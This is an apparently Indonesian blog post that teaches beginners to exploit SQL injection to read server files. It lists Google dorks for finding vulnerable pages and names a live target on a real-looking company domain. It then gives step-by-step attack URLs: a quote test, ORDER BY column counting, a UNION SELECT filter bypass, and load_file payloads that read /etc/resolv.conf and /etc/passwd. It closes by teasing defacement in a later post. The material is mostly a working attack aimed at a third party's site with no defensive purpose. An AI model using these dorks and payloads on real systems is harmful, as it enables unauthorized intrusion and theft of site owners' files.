Lompat ke konten Lompat ke sidebar Lompat ke footer

SQLI to LFI (Easy bagi pemula)

 

  Assalamu'alaikum KERR.. 

soloyo wacapp gess, balik lagi dengan gua NzXsx7 

yukk kita mulai belajarnya

kali ini gua mau kasih tutorial tentang SQLI to LFI untuk pemula

Pertama-tama kita sediakan Dork dan Payload nya

Dork? 

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=

Berhubung kita buat yang double LFI, 

Kita kasih dua payload

Payload 1

load_file(%27/etc/resolv.conf')

Payload 2

load_file('/etc/passwd')

karena males ngedork disini gua pake live target 

Live target

http://corrugated.co.id/product_detail.php?id=3

kita salin
masuk ke google crome/browser kelen masing-masing

Di belakang paramenter kita kasih tanda (') guna kita tau web vuln atau tidak. 
Contoh :
http://corrugated.co.id/product_detail.php?id=3%27
Jika eror seperti ini, dia vuln dan kita bisa kerjain ini web

Jika vuln, langsung saja kita tambahin

+order+by+1--+-

gunanya? Kita mencari bug nya di angka berapa. 

Contoh

http://corrugated.co.id/product_detail.php?id=3%27+order+by+1--+-
Jika di angka satu dia masih normal, kita tambahin ke angka dua

Contoh
http://corrugated.co.id/product_detail.php?id=3%27+order+by+2--+-

Jika belm eror juga, kita tambahin terus sampai dia ketemu eror nya. 

Berhubung diangka 2 belum eror, kita langsung ke angka 9

Contoh
http://corrugated.co.id/product_detail.php?id=3%27+order+by+9--+-

Nah, diangka 9 dia eror, kita kurangi ke angka 8.

Alhasil angka 8 dia normal. Dan angka sembilan adalah angka eror/bug nya. 

Langsung saja kita tambahin

+Union+select+1,2,3,4,5,6,7,8--+-

Contoh :
http://corrugated.co.id/product_detail.php?id=3%27+union+select+1,2,3,4,5,6,7,8--+-
Gunanya untuk mencari angka ajaib nya gaess,

Berhubung Union select ini eror, 
Maka kita kasih kode bypass saja. 

%20and%200%20union%20select%20

Contoh :

http://corrugated.co.id/product_detail.php?id=3%27%20and%200%20union%20select%201,2,3,4,5,6,7,8--+-

Nah, dia ketemu angka ajaib nya. Angka 7 dan angka 8

Lanjut, 
Kita masukkan payload pertama di angka 7

Contoh. 
http://corrugated.co.id/product_detail.php?id=3%27%20and%200%20union%20select%201,2,3,4,5,6,load_file(%27/etc/resolv.conf'),8--+-
Di sana ada dua angka ajaib angka7 dan 8. Berhubung angka 7 sudah kita masukkan payload, kita lanjut ke angka 8 kita kasih payload kedua. 

Contoh ;
http://corrugated.co.id/product_detail.php?id=3%27%20and%200%20union%20select%201,2,3,4,5,6,load_file(%27/etc/resolv.conf'),load_file('/etc/passwd')--+-
Nah, done.. Kedua payload sukses di masukkan.

Jadi materi ini tentang double LFI ya gais, 

Biar keliatan keren? 
Boleh saja kita cetak nama/nick kita di angka 7 tadi. 

Caranya? Aku akan kasih di next materi,
okk see youu next time

Terimakasih
Assalamu'alaikum.

Thanks for my friend
and you!!!

Posting Komentar untuk "SQLI to LFI (Easy bagi pemula)"